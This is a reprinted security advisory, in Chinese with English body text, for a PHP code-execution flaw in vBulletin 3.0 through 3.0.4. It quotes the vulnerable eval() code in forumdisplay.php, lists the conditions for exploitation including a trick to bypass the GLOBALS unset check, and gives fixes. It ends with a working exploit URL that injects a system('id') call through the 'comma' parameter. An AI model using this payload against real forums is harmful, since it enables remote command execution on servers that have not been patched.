网络通信 频道

vbulletin 3.0.x PHP代码执行漏洞

Vulnerable Systems:
----------------
vBulletin version 3.0 up to and including version 3.0.4

Immune systems:
----------------
vBulletin version 3.0.5
vBulletin version 3.0.6

Vulnerable code in forumdisplay.php :
#############################################################
if ($vboptions[''showforumusers''])
{
.
.
.
.

if ($bbuserinfo[''userid''])
{
.
.
.
.
$comma = '', '';
}
.
.
.
.
while ($loggedin = $DB_site->fetch_array($forumusers))
{
.
.
.
eval(''$activeusers .= "'' . $comma . fetch_template(''forumdisplay_loggedinuser'')
. ''";''); <<==== (Vuln)
$comma = '', '';
.
.
}
.
.
}

#############################################################

字串8



Conditions:
----------------
1st condition : $vboptions[''showforumusers''] == True , the admin must set
showforumusers ON in vbulletin options.
2nd condition : $bbuserinfo[''userid''] == 0 , you must be an visitor/guest
.
3rd condition : $DB_site->fetch_array($forumusers) == True , when you
visit the forums, it must has at least one user show the forum.
4th condition : magic_quotes_gpc must be OFF
SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in
init.php by secret array GLOBALS[]=1 ;)))


Solutions:
----------------
* Disable showforumusers in vbulletin options .
* add the next line before if ($vboptions[''showforumusers''])
$comma = '''';

Exploit:
----------------
example :
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system(''id'')."

 

 

文章来源地址:http://www.hackhome.com/html/wlcl/wlaq/2006/0610/26615.html

0
相关文章